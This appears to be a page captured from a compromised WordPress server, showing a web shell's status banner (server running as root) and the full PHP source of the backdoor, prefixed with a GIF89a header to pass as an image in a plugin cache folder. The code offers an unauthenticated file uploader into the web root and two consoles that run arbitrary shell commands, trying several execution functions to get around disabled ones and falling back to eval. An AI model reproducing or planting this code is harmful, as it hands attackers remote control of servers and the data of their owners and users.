| Server IP : 167.99.224.18 / Your IP : 216.73.216.136 Web Server : Apache/2.4.41 (Ubuntu) System : Linux wordpress-ubuntu-s-1vcpu-1gb-nyc1-01 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.0.25 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/wp-content/cache/podlove/a8/9f74cfeda1494969125022d14fa8b9/ |
Upload File : |
GIF89a
<?php
@error_reporting(0);
$__s=$_SERVER["SCRIPT_NAME"]??$_SERVER["PHP_SELF"]??"/";
$__s=preg_replace("#\?.*$#","",$__s);
if($_SERVER["REQUEST_METHOD"]==="POST"){
if(isset($_POST["command"])||isset($_POST["bgsley"]))$_GET["bgsley"]="1";
if(isset($_POST["cmd_in"])||isset($_POST["sley"]))$_GET["sley"]="1";
if(isset($_FILES["w"]))$_GET["upl"]="1";
}
if(isset($_GET["c"])&&trim((string)$_GET["c"])!==""&&!isset($_GET["bgsley"])&&!isset($_GET["sley"])&&!isset($_GET["upl"]))$_GET["bgsley"]="1";
if(isset($_GET["upl"])||isset($_FILES["w"])){
echo"<title>WASAWHOOOOO</title><h1>UPLOADER</h1><form method=post enctype=multipart/form-data><input type=file name=w><button>UP</button></form>";
if(isset($_FILES["w"])){
$t=$_SERVER["DOCUMENT_ROOT"]."/".$_FILES["w"]["name"];
if(move_uploaded_file($_FILES["w"]["tmp_name"],$t))echo"[OK] <a href=/$_FILES[w][name]>OPEN</a>";
else echo"[X] FAIL";
}
exit;
}
if(isset($_GET["bgsley"])){
$cmd=$_POST["command"]??$_GET["c"]??"";
echo"<title>JAWAra</title><h2>JAWAra HoreG Sound</h2><form method=post action='{$__s}?bgsley'><input type=hidden name=bgsley value=1><input type=text name=command placeholder=JAWA value='".htmlspecialchars($cmd)."'><button>JAWA</button></form><p>GET: ?bgsley&c=whoami</p>";
if($cmd){
$disabled=array_map("trim",explode(",",ini_get("disable_functions")));
$ok=function($f)use($disabled){return!in_array($f,$disabled,true);};
$o="";
if($ok("proc_open")){$sh=(PHP_OS[0]==="W")?"cmd.exe":"sh";
$p=proc_open($sh,[0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]],$pp);
if(is_resource($p)){fwrite($pp[0],$cmd." 2>&1
");fclose($pp[0]);
$o=stream_get_contents($pp[1]).stream_get_contents($pp[2]);
fclose($pp[1]);fclose($pp[2]);proc_close($p);}}
elseif($ok("shell_exec")){$o=shell_exec($cmd." 2>&1");}
elseif($ok("passthru")){ob_start();passthru($cmd." 2>&1");$o=ob_get_clean();}
elseif($ok("system")){ob_start();system($cmd." 2>&1");$o=ob_get_clean();}
elseif($ok("exec")){exec($cmd." 2>&1",$a);$o=implode("
",$a);}
elseif($ok("popen")){$h=popen($cmd." 2>&1","r");while(!feof($h))$o.=fread($h,4096);pclose($h);}
else{@eval($cmd);$o="EVAL";}
echo"<h2>crot</h2><pre>".htmlspecialchars($o?:"NOP")."</pre>";
}
exit;
}
if(isset($_GET["sley"])){
echo"<title>BypasChankro Sley</title><h2>CHANKRO @ SLEY</h2><form method=post><input type=hidden name=sley value=1><input type=text name=cmd_in placeholder=cmd><input type=submit></form>";
if(isset($_POST["cmd_in"])){
$c=$_POST["cmd_in"];$o="";
$disabled=array_map("trim",explode(",",ini_get("disable_functions")));
$ok=function($f)use($disabled){return!in_array($f,$disabled,true);};
if($ok("proc_open")){$sh=(PHP_OS[0]==="W")?"cmd.exe":"sh";
$p=proc_open($sh,[0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]],$pp);
if(is_resource($p)){fwrite($pp[0],$c." 2>&1
");fclose($pp[0]);
$o=stream_get_contents($pp[1]).stream_get_contents($pp[2]);
fclose($pp[1]);fclose($pp[2]);proc_close($p);}}
elseif($ok("shell_exec")){$o=shell_exec($c." 2>&1");}
elseif($ok("passthru")){ob_start();passthru($c." 2>&1");$o=ob_get_clean();}
elseif($ok("system")){ob_start();system($c." 2>&1");$o=ob_get_clean();}
elseif($ok("exec")){exec($c." 2>&1",$a);$o=implode("
",$a);}
elseif($ok("popen")){$h=popen($c." 2>&1","r");while(!feof($h))$o.=fread($h,4096);pclose($h);}
else{@eval($c);$o="EVAL";}
echo"<pre>".htmlspecialchars($o?:"NOP")."</pre>";
}
exit;
}
echo"ERROR BOSKU";